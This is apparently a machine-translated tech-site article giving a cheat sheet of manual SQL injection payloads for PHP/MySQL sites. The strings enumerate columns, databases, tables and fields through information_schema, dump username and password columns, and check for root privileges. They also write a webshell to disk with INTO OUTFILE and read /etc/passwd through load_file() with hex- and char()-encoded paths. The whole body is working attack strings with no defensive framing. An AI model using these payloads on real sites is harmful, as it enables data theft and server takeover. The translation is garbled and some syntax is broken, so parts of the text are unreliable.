Shulou(Shulou.com)06/01 Report--

This article mainly introduces "PHP+MySQL manual injection statement Daquan", in daily operation, I believe many people have doubts on PHP+MySQL manual injection statement Daquan problem, Xiaobian consulted all kinds of information, sorted out simple and easy to use operation methods, hope to answer "PHP+MySQL manual injection statement Daquan" doubts helpful! Next, please follow the small series to learn together!

burst field length

Order by num/*

Match field

and 1=1 union select 1,2,3,4,5…….n/*

burst field location

and 1=2 union select 1,2,3,4,5……n/*

Explode database information using built-in functions

version() database() user()

Do not guess the available fields burst database information (some sites do not apply):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

Operating system information:

and 1=2 union all select @@global.version_compile_os from mysql.user /* http://www.iis7.com/a/lm/ftp/

Database permissions:

and ord(mid(user(),1,1))=114 /* Return to normal Description is root

Burst library (mysql>5.0)

Mysql 5 and above have built-in library information_schema, which stores all database and table structure information of mysql.

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

Guess the table

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA= database (hexadecimal) limit 0 (start record, 0 is the first start record),1 (show 1 record)-

guess field

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME= table name (hexadecimal) limit 0,1

code explosion

and 1=2 Union select 1,2,3, user name segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced usage (one available field displays two data contents):

Union select 1,2,3concat(username segment, 0x3c, password segment),5,6,7,8,9 from table name limit 0,1

Write horse directly (Root permission)

Condition: 1. Know the physical path of the site

2. Have sufficient authority (can be used to select... from mysql.user test) 3、magic_quotes_gpc()=OFF123

select '' into outfile 'physical path'

and 1=2 union all select 一文HEX VALUE into outfile 'Path'

load_file() Common path:

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

The above two are to view a PHP file showing the full code. Sometimes characters are not replaced, such as "

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.